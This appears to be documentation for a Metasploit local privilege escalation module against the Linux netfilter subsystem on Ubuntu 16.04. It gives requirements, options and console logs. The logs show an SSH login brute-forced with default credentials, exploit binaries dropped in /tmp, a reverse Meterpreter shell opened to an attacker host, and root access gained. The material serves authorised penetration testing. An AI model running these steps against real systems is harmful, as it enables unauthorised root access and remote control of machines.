## Notes

Originally this module was written to drop the binary files on the target via metasm.  However, metasm wasn't able to compile due to the libc6-dev-i386 requirement, so it was decided to compile on the target or drop included binary instead of compiling real time.

This module (and the original exploit) are written in two parts: desc, and pwn.  Desc does the heavy lifting to prep/condition the environment, pwn does the payload executing.

## Creating A Testing Environment

There are a few requirements for this module to work (ubuntu):

  1. ip_tables.ko has to be loaded (root running iptables -L will do such)
  2. shem and sham can not be installed/running

This module has been tested against:

  1. Ubuntu 16.04.1 (sudo apt-get install linux-image-4.4.0-21-generic)
  2. Ubuntu 16.04 (default kernel) linux-image-4.4.0-21-generic

This does not work against the following vulnerable systems.  Additional work may be required to the binary and C code to enable these targets.
  
  1. Fedora 24 < [kernel-4.6.3-300](https://bugzilla.redhat.com/show_bug.cgi?id=1349722#c18)
  2. Fedora 22 < [kernel-4.4.14-200](https://bugzilla.redhat.com/show_bug.cgi?id=1349722#c19)
  3. RHEL < [kernel-3.10.0-327.36.1.el7](https://rhn.redhat.com/errata/RHSA-2016-1847.html)
  4. Suse < [kernel-default-3.12.59-60.45.2](http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00060.html)

## Verification Steps

  1. Start msfconsole
  2. Exploit a box via whatever method
  4. Do: `use exploit/linux/local/netfilter_priv_esc`
  5. Do: `set session #`
  6. Do: `set verbose true`
  7. Do: `exploit`

## Options

  **MAXWAIT**

  The first stage of this priv esc can take ~35seconds to execute.  This is the timer on how long we should wait till we give up on the first stage finishing.  Defaults to 120 (seconds)

  **WritableDir**

  A folder we can write files to.  Defaults to /tmp

  **REEXPLOIT**
  
  When re-exploiting, no need to run desc (it may even fail), so we can simply run pwn and get our shell.

## Scenarios

### Ubuntu 16.04.1 (with linux-image-4.4.0-21-generic)

#### Initial Access

    msf > use auxiliary/scanner/ssh/ssh_login
    msf auxiliary(ssh_login) > set rhosts 127.0.0.1
    rhosts => 127.0.0.1
    msf auxiliary(ssh_login) > set username nagios
    username => nagios
    msf auxiliary(ssh_login) > set password nagios
    password => nagios
    msf auxiliary(ssh_login) > exploit
    
    [*] SSH - Starting bruteforce
    [+] SSH - Success: 'nagios:nagios' 'uid=1000(nagios) gid=1000(nagios) groups=1000(nagios),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1001(nagcmd) Linux nagios 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
    [!] No active DB -- Credential data will not be saved!
    [*] Command shell session 1 opened (127.0.0.1:36085 -> 127.0.0.1:22) at 2016-09-16 01:15:34 -0400
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

#### Escalate

    [*] Started reverse TCP handler on 192.168.2.117:4444 
    [*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
    [+] libc6-dev-i386 is installed
    [+] gcc-multilib is installed
    [+] gcc is installed
    [*] Live compiling exploit on system
    [*] Checking if ip_tables is loaded in kernel
    [+] ip_tables.ko is loaded
    [*] Checking if shem or sham are installed
    [+] shem and sham not present.
    [*] Writing desc executable to /tmp/fI1xW1Js.c
    [*] Max line length is 65537
    [*] Writing 3291 bytes in 1 chunks of 11490 bytes (octal-encoded), using printf
    [*] Executing /tmp/fI1xW1Js, may take around 35s to finish.  Watching for /tmp/GWqpwKnG to be created.
    [*] Waited 0s so far
    [*] Waited 10s so far
    [*] Waited 20s so far
    [*] Waited 30s so far
    [+] desc finished, env ready.
    [*] Writing payload to /tmp/Thzyfenv
    [*] Max line length is 65537
    [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
    [*] Writing pwn executable to /tmp/wmfFiQKu.c
    [*] Max line length is 65537
    [*] Writing 1326 bytes in 1 chunks of 4699 bytes (octal-encoded), using printf
    [*] Transmitting intermediate stager for over-sized stage...(105 bytes)
    [*] Sending stage (1495599 bytes) to 192.168.2.137
    [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:60982) at 2016-09-24 17:22:47 -0400
    [+] Deleted /tmp/fI1xW1Js.c
    [+] Deleted /tmp/GWqpwKnG
    [+] Deleted /tmp/fI1xW1Js
    [+] Deleted /tmp/Thzyfenv
    [+] Deleted /tmp/wmfFiQKu.c
    [+] Deleted /tmp/wmfFiQKu
    
    meterpreter > sysinfo
    Computer     : ubuntu
    OS           : Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 (x86_64)
    Architecture : x86_64
    Meterpreter  : x86/linux
    meterpreter > getuid
    Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0

#### Escalate w/ pre-compiled binaries

    msf exploit(netfilter_priv_esc) > exploit
    
    [*] Started reverse TCP handler on 192.168.2.117:4444 
    [*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
    [-] libc6-dev-i386 is not installed.  Compiling will fail.
    [-] gcc-multilib is not installed.  Compiling will fail.
    [-] gcc is not installed.  Compiling will fail.
    [*] Dropping pre-compiled exploit on system
    [*] Checking if ip_tables is loaded in kernel
    [+] ip_tables.ko is loaded
    [*] Checking if shem or sham are installed
    [+] shem and sham not present.
    [*] Max line length is 65537
    [*] Writing 7820 bytes in 1 chunks of 21701 bytes (octal-encoded), using printf
    [*] Executing /tmp/8lQZGJdL, may take around 35s to finish.  Watching for /tmp/okDjTFSS to be created.
    [*] Waited 0s so far
    [*] Waited 10s so far
    [*] Waited 20s so far
    [*] Waited 30s so far
    [+] desc finished, env ready.
    [*] Writing payload to /tmp/2016_4997_payload
    [*] Max line length is 65537
    [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
    [*] Writing pwn executable to /tmp/nOO6sYqi
    [*] Max line length is 65537
    [*] Writing 8456 bytes in 1 chunks of 22023 bytes (octal-encoded), using printf
    [*] Transmitting intermediate stager for over-sized stage...(105 bytes)
    [*] Sending stage (1495599 bytes) to 192.168.2.137
    [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:46778) at 2016-09-24 21:24:22 -0400
    [+] Deleted /tmp/okDjTFSS
    [+] Deleted /tmp/2016_4997_payload
    [+] Deleted /tmp/nOO6sYqi
    
    meterpreter > sysinfo
    Computer     : ubuntu
    OS           : Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 (x86_64)
    Architecture : x86_64
    Meterpreter  : x86/linux
    meterpreter > getuid
    Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0

#### Re-exploit

In this scenario, we already exploit the box, for whatever reason our shell died.  So now we want to re-exploit, but we dont need to run desc again.

    msf exploit(netfilter_priv_esc) > set reexploit true
    reexploit => true
    msf exploit(netfilter_priv_esc) > exploit
    
    [*] Started reverse TCP handler on 192.168.2.117:4444 
    [*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
    [+] libc6-dev-i386 is installed
    [+] gcc-multilib is installed
    [+] gcc is installed
    [*] Live compiling exploit on system
    [*] Checking if ip_tables is loaded in kernel
    [+] ip_tables.ko is loaded
    [*] Checking if shem or sham are installed
    [+] shem and sham not present.
    [*] Writing payload to /tmp/egMfQrrI
    [*] Max line length is 65537
    [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
    [*] Writing pwn executable to /tmp/Yf8CAdMu.c
    [*] Max line length is 65537
    [*] Writing 1326 bytes in 1 chunks of 4699 bytes (octal-encoded), using printf
    [*] Transmitting intermediate stager for over-sized stage...(105 bytes)
    [*] Sending stage (1495599 bytes) to 192.168.2.137
    [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:60984) at 2016-09-24 17:29:06 -0400
    [+] Deleted /tmp/egMfQrrI
    [+] Deleted /tmp/Yf8CAdMu.c
    [+] Deleted /tmp/Yf8CAdMu
    
    meterpreter > 

#### Re-exploit w/ pre-compiled binaries

    msf exploit(netfilter_priv_esc) > set reexploit true
    reexploit => true
    msf exploit(netfilter_priv_esc) > exploit
    
    [*] Started reverse TCP handler on 192.168.2.117:4444 
    [*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
    [+] libc6-dev-i386 is installed
    [-] gcc-multilib is not installed.  Compiling will fail.
    [-] gcc is not installed.  Compiling will fail.
    [*] Dropping pre-compiled exploit on system
    [*] Checking if ip_tables is loaded in kernel
    [+] ip_tables.ko is loaded
    [*] Checking if shem or sham are installed
    [+] shem and sham not present.
    [*] Writing payload to /tmp/2016_4997_payload
    [*] Max line length is 65537
    [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
    [*] Writing pwn executable to /tmp/SZrv2NOR
    [*] Max line length is 65537
    [*] Writing 8456 bytes in 1 chunks of 22023 bytes (octal-encoded), using printf
    [*] Transmitting intermediate stager for over-sized stage...(105 bytes)
    [*] Sending stage (1495599 bytes) to 192.168.2.137
    [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:60996) at 2016-09-24 20:47:03 -0400
    
    meterpreter > 
